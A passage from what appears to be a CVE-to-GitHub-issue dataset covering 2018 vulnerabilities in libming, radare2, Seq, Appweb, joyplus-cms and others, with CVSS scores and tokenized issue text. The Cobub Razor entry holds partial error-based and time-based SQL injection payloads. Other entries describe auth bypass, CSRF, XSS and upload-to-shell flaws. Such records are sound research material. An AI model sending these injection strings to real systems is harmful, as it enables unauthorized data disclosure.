        "Issue_Url_old": "https://github.com/libming/libming/issues/120",
        "Issue_Url_new": "https://github.com/libming/libming/issues/120",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T09:12:13Z",
        "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7872",
        "Issue_Url_old": "https://github.com/libming/libming/issues/114",
        "Issue_Url_new": "https://github.com/libming/libming/issues/114",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T08:03:05Z",
        "description": "Invalid memory address dereference in APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function APITAG details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7873",
        "Issue_Url_old": "https://github.com/libming/libming/issues/111",
        "Issue_Url_new": "https://github.com/libming/libming/issues/111",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T07:37:59Z",
        "description": "heap buffer overflow in function APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7874",
        "Issue_Url_old": "https://github.com/libming/libming/issues/115",
        "Issue_Url_new": "https://github.com/libming/libming/issues/115",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T08:11:56Z",
        "description": "Invalid memory address dereference in strlenext (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function strlenext .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7875",
        "Issue_Url_old": "https://github.com/libming/libming/issues/112",
        "Issue_Url_new": "https://github.com/libming/libming/issues/112",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T07:44:35Z",
        "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7876",
        "Issue_Url_old": "https://github.com/libming/libming/issues/109",
        "Issue_Url_new": "https://github.com/libming/libming/issues/109",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T07:15:31Z",
        "description": "memory exhaustion in APITAG Version: APITAG libming NUMBERTAG latest version) A memory exhaustion vulnerability was found in function APITAG which allow attackers to cause a denial of service via a crafted file. ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7877",
        "Issue_Url_old": "https://github.com/libming/libming/issues/110",
        "Issue_Url_new": "https://github.com/libming/libming/issues/110",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T07:28:31Z",
        "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN) ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7998",
        "Issue_Url_old": "https://github.com/jcupitt/libvips/issues/893",
        "Issue_Url_new": "https://github.com/jcupitt/libvips/issues/893",
        "Repo_new": "jcupitt/libvips",
        "Issue_Created_At": "2018-03-05T03:39:48Z",
        "description": "NULL APITAG function pointer dereference vulnerability in APITAG NUMBERTAG Description In libvips NUMBERTAG and the master branch, A null function pointer dereference vulnerability was found in region.c, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted image file NUMBERTAG Reproduce This issue can be reproduced by the following command: vips im_copy $POC FILETAG NUMBERTAG Cause Analyze Backtrack is as flow: CODETAG The source code of APITAG ERRORTAG From gdb, we can see that the programe fails to check the function pointer in line NUMBERTAG which results in a segmentation fault: CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-7999",
        "Issue_Url_old": "https://github.com/silnrsi/graphite/issues/22",
        "Issue_Url_new": "https://github.com/silnrsi/graphite/issues/22",
        "Repo_new": "silnrsi/graphite",
        "Issue_Created_At": "2018-03-05T10:02:56Z",
        "description": "null pointer dereference vulnerability in APITAG NUMBERTAG Description A null pointer dereference vulnerability was found in APITAG which may allow attackers to cause a denial of service or possibly have unspecified other impact via a crafted font type file NUMBERTAG How to reproduce The issue can be reproduced by the following command: APITAG NUMBERTAG Cause Analyze The program failed to verify pointer m_silf in APITAG CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8048",
        "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/144",
        "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/144",
        "Repo_new": "flavorjones/loofah",
        "Issue_Created_At": "2018-03-15T14:52:43Z",
        "description": "placeholder issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8056",
        "Issue_Url_old": "https://github.com/cobub/razor/issues/162",
        "Issue_Url_new": "https://github.com/cobub/razor/issues/162",
        "Repo_new": "cobub/razor",
        "Issue_Created_At": "2018-03-10T16:58:30Z",
        "description": "Some vulnerability in Cobub Razor NUMBERTAG SQL injection Code source: PATHTAG at line NUMBERTAG The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection APITAG could result in full information disclosure. The SQL injection type: error based and AND/OR time based blind Parameter: channel_name,platform APITAG string is also applied to 'platform' at the same time NUMBERTAG channel_name=test\" AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG b NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG NUMBERTAG channel_name=test\" AND SLEEP NUMBERTAG APITAG NUMBERTAG physical path Leakage The pages leaked the absolute path: URL: FILETAG URLTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-8096",
        "Issue_Url_old": "https://github.com/datalust/seq-tickets/issues/675",
        "Issue_Url_new": "https://github.com/datalust/seq-tickets/issues/675",
        "Repo_new": "datalust/seq-tickets",
        "Issue_Created_At": "2018-03-12T22:08:19Z",
        "description": "Authentication bypass in builds up to and including NUMBERTAG A critical issue has been reported affecting versions of Seq up to and including NUMBERTAG This application logic error permits a user with access to the HTTP API gain full access to the Seq server. Seq servers with authentication enabled need to be upgraded to the latest Seq release available at URLTAG Customers without active support/maintenance should contact EMAILTAG for information regarding a down level patch. Timeline NUMBERTAG On February NUMBERTAG th NUMBERTAG we were notified privately of the existence of the bug NUMBERTAG We immediately verified the issue and evaluated options for mitigation; having determined that a low risk fix was possible, we commenced work on a new version to resolve the issue NUMBERTAG Within NUMBERTAG hours of the report we emailed customers and active trial users with information about the bug and availability of the fixed release; we also produced and included a down level patch for customers running unsupported/legacy versions NUMBERTAG To allow for upgrades to take place, a minimum NUMBERTAG day window was provided before raising this publicly visible report _In the interests of our customers, Datalust will not confirm or disclose security issues until an investigation has been completed and patches or mitigations are available._ Details Authentication and authorization are separate in the NUMBERTAG Seq security model. Unauthenticated requests are allowed access to various assets required for correctly displaying the APITAG page; further authorization is bypassed when allowed unauthenticated requests are processed. Among these assets are a group of four system settings including authentication options and some details of the authentication provider. A missing check for the HTTP PUT method inadvertently enabled write access to these settings, through which the authentication provider can be modified or disabled. Impact By disabling authentication, an attacker may gain admin access to the Seq web application. Through the plug in \"app\" mechanism, this can be used to execute code on the Seq server with the capabilities/access level of the APITAG process. The bug cannot be used to read user passwords, which for basic authentication are stored by Seq as salted PBKDF2 hashes. The bug is not exploitable through a port locked down as ingestion only, i.e. using the APITAG configuration setting. Patch availability The bug is fixed in Seq versions NUMBERTAG onwards. All users with a supported Seq license relying on authentication should update immediately to the most recent Seq NUMBERTAG ersion (version FILETAG at the time of writing. Users without current support/maintenance can access a patch for earlier versions by contacting EMAILTAG . Postmortem We have identified two main factors that enabled this bug to remain undetected: Programmatic security configuration: the endpoints in question do appear to perform correct security checks, however because the responsibility for implementing this was spread between several unrelated blocks of code, the override was not obvious to inspection A test blindspot covering code added very early in product development: the settings mechanism was added very early in product development, at a time when integration test coverage was low; as testing has matured along with the rest of the product, some older code remained with low test coverage As a result, a new, declarative security model has been implemented for Seq NUMBERTAG This provides a basis for more precise test coverage, and also produces auditable documentation directly from the API security configuration. We have also undertaken a further review of Seq NUMBERTAG Additional test coverage has been added, and in versions from NUMBERTAG onwards we took the additional step of centralizing a public URL/method white list to improve auditability and reduce the likelihood of re introducing this kind of issue in later code changes. We're sorry for any inconvenience caused by this bug and would like to reiterate our commitment to producing the most secure Seq possible, and our dedication to handling security issues in a responsible and timely manner. Customers with questions or concerns may contact EMAILTAG for assistance. Datalust is grateful to Daniel Chactoura of APITAG for identifying and privately disclosing this issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-8097",
        "Issue_Url_old": "https://github.com/pyeve/eve/issues/1101",
        "Issue_Url_new": "https://github.com/pyeve/eve/issues/1101",
        "Repo_new": "pyeve/eve",
        "Issue_Created_At": "2018-01-14T11:42:00Z",
        "description": "Where can I report security vulnerability?. Hi, I found a potential vulnerability in the latest version of Eve. Is there any security related email I can send my report? Thanks :)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-8715",
        "Issue_Url_old": "https://github.com/embedthis/appweb/issues/610",
        "Issue_Url_new": "https://github.com/embedthis/appweb/issues/610",
        "Repo_new": "embedthis/appweb",
        "Issue_Created_At": "2018-03-12T02:11:40Z",
        "description": "Basic/digest bypass with null password. Overview A security vulnerability affecting Appweb versions up to and including NUMBERTAG with a specially crafted WWW Authenticate header has been identified. This bulletin discusses this flaw and its implications. Summary A HTTP request with specially crafted, invalid WWW Authenticate header field with a missing password and known username will bypass the password check. Sites using basic or digest authentication may be impacted. Sites using web based forms for authentication will not be impacted. Description The WWW Authenticate header supplies the username and password for authentication of the request. If an invalid WWW Authenticate header is used with a known, valid username and without supplying a password, the request will bypass authentication and be accepted. The exploit requires: A site supporting browser based basic and digest authentication. Sites using web based forms for username and password are not impacted. A specially crafted WWW Authenticate is required with a missing password field. An empty password will not suffice. A valid user name must be supplied. Note: Browsers cannot initiate an exploit via normal web pages. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity High. An attacker could bypass authentication. Remedy Apply the quick patch below to Appweb NUMBERTAG to NUMBERTAG Alternatively, upgrade to Appweb NUMBERTAG when it is released. Appweb NUMBERTAG is highly compatible with Appweb NUMBERTAG and upgrading should be relatively straightforward. Quick Patch ERRORTAG Thanks This issue was discovered by security researcher, Davide Quarta ( APITAG and Truel IT, has reported this vulnerability to Beyond Security\u2019s APITAG Secure Disclosure program. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-8717",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/419",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/419",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-03-14T08:19:20Z",
        "description": "\u7f51\u7ad9\u5b58\u5728csrf. joyplus cms\u7528\u6237\u7ba1\u7406\u6dfb\u52a0\u5904\u5b58\u5728csrf\u6f0f\u6d1e\u3002 paylod\uff1a CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8766",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/421",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/421",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-03-16T04:00:29Z",
        "description": "joyplus cms NUMBERTAG has File upload results in getshell. joyplus cms NUMBERTAG has File upload results in getshell url: APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-8767",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/420",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/420",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-03-16T03:45:39Z",
        "description": "joyplus cms NUMBERTAG has Cross Site Scripting. joyplus cms NUMBERTAG has Cross Site Scripting: payload\uff1a CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-8804",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1025",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1025",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-15T05:43:27Z",
        "description": "double free. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw tiff webp x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8806",
        "Issue_Url_old": "https://github.com/libming/libming/issues/128",
        "Issue_Url_new": "https://github.com/libming/libming/issues/128",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-18T18:01:55Z",
        "description": "heap use after free in APITAG (decompile.c). On latest version of libming, there is a heap use after free in APITAG function of decompile.c, which could be triggered by the POC below. To reproduce the issue, run: PATHTAG $POC POC could be downloaded at: FILETAG OUTPUT: header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG NUMBERTAG SWF_DOACTION / APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffec NUMBERTAG d0 sp NUMBERTAG ffec NUMBERTAG c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a8dbfc NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8807",
        "Issue_Url_old": "https://github.com/libming/libming/issues/129",
        "Issue_Url_new": "https://github.com/libming/libming/issues/129",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-18T18:28:57Z",
        "description": "heap use after free in APITAG (decompile.c). On latest version of libming, these is a heap use after free in function APITAG of decompile.c, which could be triggered by the POC below. To reproduce the issue, run: PATHTAG $POC POC could be downloaded at: FILETAG OUTPUT: PATHTAG PATHTAG header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG NUMBERTAG Note: APITAG and/or APITAG are not NUMBERTAG SWF_DOACTION / APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffe NUMBERTAG b NUMBERTAG sp NUMBERTAG ffe NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG ee in APITAG PATHTAG NUMBERTAG e6 in APITAG PATHTAG NUMBERTAG e6 in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG fd2c9a NUMBERTAG c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8808",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9725",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9725",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-03-19T17:43:50Z",
        "description": "heap buffer overflow in r_asm_disassemble APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Dalvik dex Architecture/bits of the file: Arm/dex version NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: APITAG build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 A $POC NUMBERTAG the POC is attached: The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG bfc1 at pc NUMBERTAG f NUMBERTAG da7b NUMBERTAG bp NUMBERTAG ffd NUMBERTAG e NUMBERTAG sp NUMBERTAG ffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG bfc1 thread T NUMBERTAG f NUMBERTAG da7b NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG de in r_asm_disassemble FILETAG PATHTAG NUMBERTAG f NUMBERTAG d5a4b NUMBERTAG in r_core_anal_op PATHTAG NUMBERTAG f NUMBERTAG d5b NUMBERTAG b5 in fcn_callconv PATHTAG NUMBERTAG f NUMBERTAG d5b NUMBERTAG b5 in r_core_anal_all PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG e2ab in cmd_anal_all PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG in cmd_anal PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG d8 in r_cmd_call PATHTAG NUMBERTAG f NUMBERTAG d4fefe2 in r_core_cmd_subst_i PATHTAG NUMBERTAG f NUMBERTAG d4f NUMBERTAG d in r_core_cmd_subst PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f NUMBERTAG in r_core_cmd PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in r_core_cmd0 PATHTAG NUMBERTAG cc NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG cc NUMBERTAG bd NUMBERTAG in _start ( PATHTAG )",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-8809",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9726",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9726",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-03-19T17:46:24Z",
        "description": "heap buffer overflow in dalvik_op APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Dalvik dex Architecture/bits of the file: Arm/dex version NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: d NUMBERTAG faff build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 A $POC the POC is attached: FILETAG The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG f8cd NUMBERTAG c NUMBERTAG bp NUMBERTAG ffd4b4f2b NUMBERTAG sp NUMBERTAG ffd4b4f2b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG f8cd NUMBERTAG c NUMBERTAG in dalvik_op PATHTAG NUMBERTAG f8cd NUMBERTAG in r_anal_op PATHTAG NUMBERTAG f8cd NUMBERTAG d NUMBERTAG in r_core_anal_search_xrefs PATHTAG NUMBERTAG f8cd NUMBERTAG dc2 in r_core_anal_refs PATHTAG NUMBERTAG f8cd NUMBERTAG in cmd_anal_all PATHTAG NUMBERTAG f8cd NUMBERTAG in cmd_anal PATHTAG NUMBERTAG f8cd NUMBERTAG d8 in r_cmd_call PATHTAG NUMBERTAG f8cd NUMBERTAG b7fe2 in r_core_cmd_subst_i PATHTAG NUMBERTAG f8cd NUMBERTAG b NUMBERTAG d in r_core_cmd_subst PATHTAG NUMBERTAG f8cd NUMBERTAG bcf NUMBERTAG in r_core_cmd PATHTAG NUMBERTAG f8cd NUMBERTAG bdd NUMBERTAG in r_core_cmd0 PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG f8cd2c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG dd NUMBERTAG in _start ( PATHTAG )",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-8810",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9727",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9727",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-03-19T18:03:25Z",
        "description": "heap buffer overflow in get_ivar_list_t APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Mach O Architecture/bits of the file: arm subarchitecture NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: d NUMBERTAG faff build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 qc ij $POC the POC is attached: FILETAG The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b3d at pc NUMBERTAG f NUMBERTAG b3e5 bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG c0 sp NUMBERTAG ffc NUMBERTAG f6e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b3d thread T NUMBERTAG f NUMBERTAG b3e4 in strdup ( PATHTAG NUMBERTAG f NUMBERTAG bc0e3c in get_ivar_list_t PATHTAG NUMBERTAG f NUMBERTAG bc4adf in get_class_ro_t PATHTAG NUMBERTAG f NUMBERTAG bc NUMBERTAG b in get_class_t PATHTAG NUMBERTAG f NUMBERTAG bc5b NUMBERTAG in parse_classes PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG in r_bin_object_set_items PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG a in r_bin_object_new PATHTAG NUMBERTAG f NUMBERTAG af1dad in r_bin_file_new_from_bytes PATHTAG NUMBERTAG f NUMBERTAG ad5d NUMBERTAG in r_bin_load_io_at_offset_as_sz PATHTAG NUMBERTAG f NUMBERTAG ad5df5 in r_bin_load_io_at_offset_as PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG in r_bin_load_io PATHTAG NUMBERTAG f NUMBERTAG bd3c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG bd4f2e in r_core_bin_load PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG dd NUMBERTAG in _start ( PATHTAG )",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-8811",
        "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/586",
        "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/586",
        "Repo_new": "alkacon/opencms-core",
        "Issue_Created_At": "2018-03-20T04:50:33Z",
        "description": "Cross Site Request Forgery Vulnerability in APITAG NUMBERTAG Hi Team, I would like to report Multiple CSRF vulnerability in latest version. mitre.org assigned new CVE for this vulnerabiliity. Description: Cross site request forgery (CSRF) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation. Steps to Reproduce NUMBERTAG Send below crafted request to logged in user who is having Root Administrator level access. CODETAG NUMBERTAG Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully. Fix: Implementation of random token in every state changing request will mitigate the issue. Affected Version NUMBERTAG release",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8813",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/670",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/670",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2018-03-18T12:43:32Z",
        "description": "APITAG NUMBERTAG Open Redirection Vulnerability. Steps to reproduce the problem NUMBERTAG Navigate to http:// FILETAG Additional information NUMBERTAG Attacker can redirect users to malicious domains and can perform social engineering attacks. Wolf CMS version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
